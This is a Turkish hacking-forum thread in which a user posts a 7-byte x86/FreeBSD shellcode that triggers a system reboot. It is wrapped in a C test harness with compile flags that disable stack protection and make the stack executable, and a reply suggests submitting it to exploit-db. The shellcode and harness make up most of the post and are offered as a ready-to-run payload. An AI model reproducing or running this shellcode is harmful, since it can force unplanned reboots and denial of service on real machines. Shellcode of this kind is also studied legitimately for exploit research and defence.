İPUCU

Bug Researchers Yeni bulunan açıklar.

Seçenekler

x86/FreeBSD reboot(0x1) & exit(0) Shellcode

20-08-2016 20:02
#1
22a02 - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2016
Nereden:
Assembly
Mesajlar:
10
Teşekkür (Etti):
0
Teşekkür (Aldı):
3
Konular:
10
#Gecmise Donus \w xd3.



Kod:
/*
 *             ::reboot(0x1) & exit(0) Shellcode
 *   __author__: xd3
 *   __format__: ELF 32 Bit
 * __platform__: x86/FreeBSD
 *     __size__: 7 Bytes
 *    
 */
 
 /* Usage:
  * 
  * # gcc -fno-stack-protector -z execstack xd3.c -o xd3
  * # ./xd3
  * [~] Byte-Code Len: 7
  * .. Reboots
  */

#include <stdio.h>
#include <string.h>

const unsigned char xd3[] = \
"\x6a\x37\x58"
"\x99\x52\xcd"
"\x80";

int main(vo id){ 
    printf("[~] Byte-Code Len: %d\n", strlen(xd3));
    vo id (*sh3llcode)() = (vo id *)xd3;
    sh3llcode();
}


<-- IMG - 0x1 -->


<-- IMG - 0x2 -->

Soru & Cevap
Alıntı:
'Timurhan´isimli üyeden Alıntı Mesajı göster
Ellerine sağlık.
Özgün shellcode ise exploit-db bildiri yapabilirmisin.

Yaklasik 9 - 10 ay once yazmis oldugum ornek, ancak sifrelenmis bayt kodlaridir. Aylar once kaybettigim bir diskte yer alan bu bayt kodlarini cozup kucuk duzenlemeler yaparak paylasiyorum su an. Elbet ki kisa sure sonra ozenerek, minimum bayt sayisina indirgeterek yazip o tarz platformlarda paylasirim. Yorumunuz icin tesekkurlerimi sunarim.

Konu 22a02 tarafından (20-08-2016 20:12 Saat 20:12 ) değiştirilmiştir.

20-08-2016 20:05
#2
'Timurhan - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2016
Mesajlar:
631
Teşekkür (Etti):
217
Teşekkür (Aldı):
544
Konular:
83
Ellerine sağlık.
Özgün shellcode ise exploit-db bildiri yapabilirmisin.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı